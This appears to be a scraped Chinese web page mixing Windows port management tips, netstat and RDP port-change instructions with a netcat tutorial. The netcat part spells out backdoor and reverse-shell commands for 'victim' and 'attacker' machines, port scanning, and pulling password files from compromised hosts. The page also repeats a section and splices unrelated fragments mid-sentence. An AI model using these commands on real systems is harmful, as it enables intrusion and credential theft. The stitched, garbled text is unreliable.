网上邻居 属性 本地连接 属性 TCP/IP协议 高级 选项 TCP/IP筛选 属性。
控制面板 管理工具 服务 开启80端口
手动打开端口:
1 右键点击网上邻居,选择属性。
2 右键点击用于连接Internet的连接,选择属性。
3 选择高级页,点击设置按钮。
注意:如果设置按钮是灰的,则说明当前的连接没有启用Internet连接防火墙。所有的端口都是打开的。
4 在列表中选择需要打开的端口。
5 如果端口不在列表中,点击添加按钮。
6 在服务描述编辑框中,输入一个描述名称,如文件共享:端口445。
7 在计算机的名称和IP地址编辑框中,输入127001。
8 在外部端口号和内部端口号中输入需要的端口。他们一般是同一个端口号。
9 选择TCP或者UDP,点击确定。
10 重复相面的步骤一个一个的打开需要的端口。
~-~如果你装了服务系统软件的话。默认>你好,这个就OK
netstat
命令中各选项的含义如下:
-a 显示所有socket,包括正在监听的。
-c 每隔1秒就重新显示一遍,直到用户中断它。
-i 显示所有网络接口的信息,格式同“ifconfig -e”。
-n 以网络IP地址代替名称,显示出网络连接情形。
-r 显示核心路由表,格式同“route -e”。
-t 显示TCP协议的连接情况。
-u 显示UDP协议的连接情况。
-v 显示正在进行的工作。
Netstat
这个命令可以加一些参数:
-n 显示IP地址和端口的数目。
-S 显示每个协议的连接状态。
-a 显示所有的连接和监听端口。(服务所有连接通常不显示的)
-e 显示太网的连接状态。最好与-s合用。
-P PROTO 显示特定的协议连接状态。
显示:
Proto Local Address Foreign Address State
TCP 19216814246:1148 61152160154:80 ESTABLISHED
TCP 19216814246:1180 22213711647:80 ESTABLISHED
TCP 19216814246:1181 22213711647:80 ESTABLISHED
TCP 19216814246:1182 15922620259:80 ESTABLISHED
TCP 19216814246:1183 2074619860:80 TIME_WAIT进入CMD后,输入:net start 服务名 就是开了某个端口。
net start 服务名:开启服务;(如:net start telnet, net start schedule)
net stop 服务名 :停止某服务。
注:一个端口对应一个服务名。用瑞士军刀——netcat
命令格式:nc -l -p 你要开放的端口
有关nc的用法一定要在cmd瑞士军刀所在目录下用
其他用法:
NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大
对比win2000微软的telnetexe和微软的tlntsvrexe服务,连接的时候就可以看出来了
11 NCEXE是一个非标准的telnet客户端程序,
12 还有一个puttyexe客户端程序,提供四种连接模式
-raw -telnet -rlogin -ssh
虽然现在也新出了GUI版的中文“NC”,但是相比起来还是这个好用。
######################################################################
2 Netcat 110 for NT 帮助信息
######################################################################
C:WINDOWSDesktop>nc -h
[v110 NT]
connect to somewhere: nc [-options] hostname port[s] [ports]
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后台模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12,
-h this cruft (本帮助信息)
-i secs delay interval for lines sent, ports scanned (延迟时间)
-l listen mode, for inbound connects (监听模式,等待连接)
-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)
-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)
-o file hex dump of traffic (十六进制模式输出文件,三段)
-p port local port number (本地端口)
-r randomize local and remote ports (随机本地远程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (扫描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive]
######################################################################
3 Netcat 110 常用的命令格式
######################################################################
31端口的刺探:
nc -vv ip port
RIVER [1921680198] 19190 () open //显示是否开放open
32扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,系统管理员会额外小心
33 后门
victim machine: //受害者的机器
nc -l -p port -e cmdexe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器
nc ip -p port //连接victim_IP,然后得到一个shell。
32扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,系统管理员会额外小心
33 后门
victim machine: //受害者的机器
nc -l -p port -e cmdexe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器
nc ip -p port //连接victim_IP,然后得到一个shell。
34反向连接
attacker machine: //一般是sql2exe,远程溢出,webdavx3exe攻击
//或者wollf的反向连接
nc -vv -l -p port
victim machine:
nc -e cmdexe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /用于输入/
nc -vv -l -p prot2 /用于显示/
victim machine:
nc attacker_ip port1 cmdexe nc attacker_ip port2
nc attacker_ip port1 /bin/sh nc attacker_ip port2
139要加参数-s(ncexe -L -p 139 -d -e cmdexe -s 对方机器IP)
这样就可以保证ncexe优先于NETBIOS。 35传送文件:
351 attacker machine <-- victim machine //从肉鸡拖密码文件回来
nc -d -l -p port < pathfiledest /attacker machine/ 可以shell执行
nc -vv attacker_ip port > pathfiletxt /victim machine/ 需要Ctrl+C退出
//肉鸡需要gui界面的cmdexe里面执行(终端登陆,不如安装FTP方便)否则没有办法输入Crl+C
352 attacker machine --> victim machine //上传命令文件到肉鸡
nc -vv -l -p port > pathfiletxt /victim machine/ 需要Ctrl+C退出
nc -d victim_ip port < pathfiledest /attacker machine/ 可以shell执行
//这样比较好我们登陆终端入侵其他的肉鸡可以选择shell模式登陆
结论: 可以传输ascii,bin文件可以传输程序文件
问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出ncexe
或者只有再次连接使用pskillexe 杀掉进程但是是否释放传输文件打开的句柄了
36 端口数据抓包
nc -vv -w 2 -o testtxt >第一步:在IE中选择“工具→Internet选项”,切换到“高级”标签,勾选“使用SSL 20”和“使用SSL 30”两项。切换到“安全”标签,单击“自定义级别”按钮,确保“显示混合内容”一项为“启用”或“提示”。
第二步:运行“servicesmsc”命令打开服务管理窗口,找到一项名为“>在Windows 2000/XP/Server 2003中要查看端口,可以使用Netstat命令:
依次点击“开始→运行”,键入“cmd”并回车,打开命令提示符窗口。在命令提示符状态下键入“netstat -a -n”,按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。
关闭/开启端口
在介绍各种端口的作用前,这里先介绍一下在Windows中如何关闭/打开端口,因为默认的情况下,有很多不安全的或没有什么用的端口是开启的,比如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等等。为了保证系统的安全性,我们可以通过下面的方法来关闭/开启端口。
关闭端口
比如在Windows 2000/XP中关闭SMTP服务的25端口,可以这样做:首先打开“控制面板”,双击“管理工具”,再双击“服务”。接着在打开的服务窗口中找到并双击“Simple Mail Transfer Protocol (SMTP)”服务,单击“停止”按钮来停止该服务,然后在“启动类型”中选择“已禁用”,最后单击“确定”按钮即可。这样,关闭了SMTP服务就相当于关闭了对应的端口。
开启端口
如果要开启该端口只要先在“启动类型”选择“自动”,单击“确定”按钮,再打开该服务,在“服务状态”中单击“启动”按钮即可启用该端口,最后,单击“确定”按钮即可。
提示:在Windows 98中没有“服务”选项,你可以使用防火墙的规则设置功能来关闭/开启端口。
端口分类
右击“我的电脑”——属性——远程——勾选“允许从这台计算机发送远程协助邀请”和“允许用户远程连接到此计算机”
开启3389端口很危险 不要乱搞黑客活动 引火烧身的
打字不易,如满意,望采纳。
1、打开cmd命令行,在cmd命令行下输入:tasklist/svc在输出的内容中查找svchostexe进程下termservice服务对应的PID,在此查看的PID为:1336
2、然后输入命令:netstat-ano找到对应PID就能找到对应远程端口,在此远程端口为3389端口
3、如此方式不可用,可在注册表中查看:在运行框中输入:regedit打开注册表,找到以下路径中的PortNumber文件,双击选择十进制可查看或修改端口。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp\PortNumber]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber]
4、在此将远程端口修改为33899,使用tasklist/svc查看PID,因主机重启过,在此查看对应PID为:1260。
5、使用netstat-ano查看对应端口,在此找到对应的端口为修改后的端口33899。
6、远程测试成功如图:
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)